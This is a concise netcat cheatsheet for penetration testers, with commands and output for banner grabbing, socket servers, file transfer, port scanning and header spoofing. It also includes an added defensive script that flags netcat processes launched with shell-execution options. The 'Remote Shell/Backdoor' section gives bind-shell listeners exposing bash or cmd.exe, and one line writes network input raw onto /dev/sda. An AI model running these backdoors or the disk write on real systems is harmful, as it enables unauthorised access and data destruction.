The Concise NetCat CheatSheet for Pentesters
This cheatsheet was put together in response to an increasing prevalence of ‘cheatsheets’ so vast in size that they might as well be labelled “extended help”. This article will be updated with cool stuff over time.
Netcat Telnet
$ nc -v google.com 80
Connection to google.com 80 port [tcp/http] succeeded!
GET index.html HTTP/1.1
HTTP/1.1 302 Found
Location: http://www.google.com/
Cache-Control: private
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sat, 18 Aug 2012 06:03:04 GMT
Server: sffe
Content-Length: 219
X-XSS-Protection: 1; mode=block
<HTML><HEAD><meta http-equiv="content-type" content="text/html;charset=utf-8">
<TITLE>302 Moved</TITLE></HEAD><BODY>
<H1>302 Moved</H1>
The document has moved
<A HREF="http://www.google.com/">here</A>.
</BODY></HTML>
Netcat Simple Socket Servers
$ nc -l -v 1234
$ telnet localhost 1234
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
abc
ting tong
After connecting, we send some test messages such as abc and ting tong to the netcat socket server. The netcat socket server prints the data it receives from the telnet client to its own terminal.
$ nc -l -v 5555
Connection from 127.0.0.1 port 5555 [tcp/rplay] accepted
abc
ting tong
Complete ECHO Server
$ ncat -v -l -p 5555 -c 'while true; do read i && echo [echo] $i; done'
To write everything the server receives to a file instead:
$ nc -l -v 1234 > data.txt
UDP Server
$ nc -v -ul 7000
Connect to this server using netcat from another terminal
$ nc localhost -u 7000
$ netstat | grep 7000
udp 0 0 localhost:42634 localhost:7000 ESTABLISHED
Netcat File transfer
On machine A – Send File
$ cat happy.txt | ncat -v -l -p 5555
Ncat: Version 5.21 ( http://nmap.org/ncat )
Ncat: Listening on 0.0.0.0:5555
On machine B – Receive File
$ ncat localhost 5555 > happy_copy.txt
Netcat Port Scanning
$ nc -v -n -z -w 1 192.168.1.2 75-85
nc: connect to 192.168.1.2 port 75 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 76 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 77 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 78 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 79 (tcp) failed: Connection refused
Connection to 192.168.1.2 80 port [tcp/*] succeeded!
nc: connect to 192.168.1.2 port 81 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 82 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 83 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 84 (tcp) failed: Connection refused
nc: connect to 192.168.1.2 port 85 (tcp) failed: Connection refused
Netcat Linux Remote Shell/Backdoor
$ ncat -v -l -p 7777 -e /bin/bash
Connect to this bash shell using nc from another terminal
$ nc localhost 7777
Netcat Windows Remote Shell/Backdoor
C:\tools\nc>nc -v -l -n -p 8888 -e cmd.exe
listening on [any] 8888 ...
connect to [127.0.0.1] from (UNKNOWN) [127.0.0.1] 1182
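A defender's view of the two listeners above, as an added example that is not part of the original cheatsheet: a shell function that scans a process listing for nc/ncat/netcat started with -e or -c (or ncat's --exec/--sh-exec/--lua-exec), the options that hand a program to the socket. The process lines are constructed sample data in `ps -eo pid,user,args` layout, and the function names are hypothetical.

```shell
#!/bin/sh
# Constructed sample input: "PID USER COMMAND ARGS..." lines.
sample_ps() {
cat <<'EOF'
 812 root   /usr/sbin/sshd -D
1440 alice  nc -v google.com 80
1502 www    ncat -v -l -p 7777 -e /bin/bash
1617 bob    nc -k -l 2389
1733 www    /tmp/.x/nc -lvnp 8888 -e /bin/sh
1805 carol  ncat -v -l -p 5555 -c while true; do read i; done
1911 dave   grep -e nc /etc/services
EOF
}

# Reads a process listing on stdin and prints "PID USER TOOL FLAG" for every
# netcat-family process that was started with a command-execution option.
flag_nc_exec() {
  awk '
  {
    # Basename of the executable, lower-cased, without an optional .exe suffix.
    n = split($3, parts, "/"); exe = tolower(parts[n]); sub(/\.exe$/, "", exe)
    if (exe != "nc" && exe != "ncat" && exe != "netcat") next
    hit = ""
    for (i = 4; i <= NF; i++) {
      if ($i ~ /^--(exec|sh-exec|lua-exec)$/) { hit = $i; break }
      # Short options may be bundled (-lvnp), so look inside the bundle.
      # Everything after -e / -c is the command itself: stop scanning there.
      if ($i ~ /^-[A-Za-z0-9]+$/ && $i ~ /[ec]/) { hit = $i; break }
    }
    if (hit != "") print $1, $2, exe, hit
  }'
}

sample_ps | flag_nc_exec
```

On a live host the same function can be fed with `ps -eo pid,user,args | flag_nc_exec`; a renamed binary will not match on name, so treat this as one signal alongside listening-socket review.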
Netcat Cloning Hard Drives & Partition
$ nc -l -p 1234 | dd of=/dev/sda
Netcat as a Webserver
$ while true; do nc -l -p 80 -q 1 < somepage.html; done
NETCAT Spoofing HTTP Headers
You can use netcat to request web pages:
nc ispconfig.org 80
You can then type in headers as follows:
GET / HTTP/1.1
Host: ispconfig.org
Referer: mypage.com
User-Agent: my-browser
server2:~# nc example.com 80
GET / HTTP/1.1
Host: example.com
Referer: mypage.com
User-Agent: my-browser
HTTP/1.1 200 OK
Date: Fri, 28 Nov 2008 14:11:49 GMT
Server: Apache/2.2.3 (Debian) mod_ssl/2.2.3 OpenSSL/0.9.8c
Last-Modified: Wed, 26 Nov 2008 19:34:17 GMT
ETag: "228c707-21b1-b6b7e040"
Accept-Ranges: bytes
Content-Length: 8625
Content-Type: text/html
[...]
Netcat Timeouts
Server :
$ nc -l 2389
Client :
$ nc -w 10 localhost 2389
Netcat IPV6 Connectivity
The -4 flag forces nc to use IPv4 addresses only.
Server :
$ nc -4 -l 2389
Client :
$ nc -4 localhost 2389
Now, if we run the netstat command, we see :
$ netstat | grep 2389
tcp 0 0 localhost:2389 localhost:50851 ESTABLISHED
tcp 0 0 localhost:50851 localhost:2389 ESTABLISHED
Now, if we force nc to use IPv6 addresses with the -6 flag:
Server :
$ nc -6 -l 2389
Client :
$ nc -6 localhost 2389
Now, if we run the netstat command, we see :
$ netstat | grep 2389
tcp6 0 0 localhost:2389 localhost:33234 ESTABLISHED
tcp6 0 0 localhost:33234 localhost:2389 ESTABLISHED
Force Netcat Server to Stay Up
By default the nc server exits as soon as the client disconnects. This behaviour can be changed with the -k flag on the server side, which forces the server to stay up even after the client has disconnected.
$ nc -k -l 2389
Configure Netcat Client to Stay Up after EOF
$ nc -q 5 localhost 2389